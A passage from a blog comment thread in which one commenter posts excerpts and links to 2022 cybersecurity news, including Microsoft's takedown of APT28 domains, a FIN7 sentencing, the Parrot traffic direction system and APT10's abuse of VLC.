    Microsoft says it obtained a court order on April 6 to take control of seven domains and disrupt Russia-linked hacking group Strontium’s attacks against Ukraine — Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking …

    Microsoft takes down APT28 domains used in attacks against Ukraine
    https://www.bleepingcomputer.com/news/microsoft/microsoft-takes-down-apt28-domains-used-in-attacks-against-ukraine/

    Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure.

    Strontium (also tracked as Fancy Bear or APT28), linked to Russia’s military intelligence service GRU, used these domains to target multiple Ukrainian institutions, including media organizations.

    The domains were also used in attacks against US and EU government institutions and think tanks involved in foreign policy.

    “On Wednesday, April 6th, we obtained a court order authorizing us to take control of seven internet domains Strontium was using to conduct these attacks,” said Tom Burt, Corporate Vice President of Customer Security & Trust at Microsoft.

    “We have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium’s current use of these domains and enable victim notifications.

    Reply
  41. Tomi Engdahl says:

    Tonya Riley / CyberScoop:
    US judge sentences Denys Iarmak, a Ukrainian and member of the FIN7 hacking group, to five years in prison; FIN7 has stolen 20M+ credit card numbers since 2015 — Denys Iarmak, a high-level member of the criminal hacking group FIN7, was sentenced to five years in prison today by a U.S. judge.
    FIN7 hacker sentenced to five years
    https://www.cyberscoop.com/fin7-hacker-sentenced-denys-iarmak/

    Reply
  42. Tomi Engdahl says:

    Naomi Nix / Washington Post:
    Meta disrupts covert influence operations by Belarus- and Russia-linked actors targeting Ukrainians, like hacking Ukrainian military staff’s Facebook accounts
    https://www.washingtonpost.com/technology/2022/04/07/facebook-covert-influence-ukraine/

    Reply
  43. Tomi Engdahl says:

    Malicious web redirect service infects 16,500 sites to push malware
    https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/

    A new traffic direction system (TDS) called Parrot is relying on servers that host 16,500 websites of universities, local governments, adult content platforms, and personal blogs.

    Parrot’s use is for malicious campaigns to redirect potential victims matching a specific profile (location, language, operating system, browser) to online resources such as phishing and malware-dropping sites.

    Threat actors running malicious campaigns buy TDS services to filter incoming traffic and send it to a final destination serving malicious content.

    TDS are also legitimately used by advertisers and marketers, and some of these services were exploited in the past to facilitate malspam campaigns.

    Threat actors have planted a malicious web shell on compromised servers and copied it to various locations under similar names that follow a “parroting” pattern.

    Moreover, the adversaries use a PHP backdoor script that extracts client information and forwards requests to the Parrot TDS command and control (C2) server.

    Reply
  44. Tomi Engdahl says:

    Everyone’s favorite media player abused to launch malware attacks
    By Sead Fadilpašić published 2 days ago
    Chinese threat actors are abusing VLC
    https://www.techradar.com/news/everyones-favorite-media-player-abused-to-launch-malware-attacks

    Cybercriminals are using the popular VLC media player to distribute malware and spy on government agencies and adjacent organizations, cybersecurity researchers have warned.

    As reported by BleepingComputer, a threat actor called Cicada (also known as Stone Panda and APT10) is targeting organizations in the government, legal, and NGO sectors, as well as some engaged in “religious activities”.

    Speaking to Bleeping Computer, Brigid O Gorman of Symantec said the attackers “side-loaded” the malware, using a clean version of VLC with a malicious DLL file in the same path as the media player’s export functions

    Reply
  45. Tomi Engdahl says:

    Tietoturva-asiantuntija kyberiskusta: Kuin joku olisi käynyt töhrimässä ilmoitus­taulua https://www.is.fi/digitoday/art-2000008740603.html

    Reply
  46. Tomi Engdahl says:

    Google Bans Apps With Hidden Data-Harvesting Software
    Code placed in consumer-facing apps is tied to U.S. national-security contractors, documents show
    https://www.wsj.com/articles/apps-with-hidden-data-harvesting-software-are-banned-by-google-11649261181

    Google has yanked dozens of apps from its Google Play store after determining that they include a software element that surreptitiously harvests data.

    The Panamanian company that wrote the code, Measurement Systems S. de R.L., is linked through corporate records and web registrations to a Virginia defense contractor that does cyberintelligence, network-defense and intelligence-intercept work for U.S. national-security agencies.

    Reply

Leave a Reply to Tomi Engdahl Cancel reply

Your email address will not be published. Required fields are marked *

*

*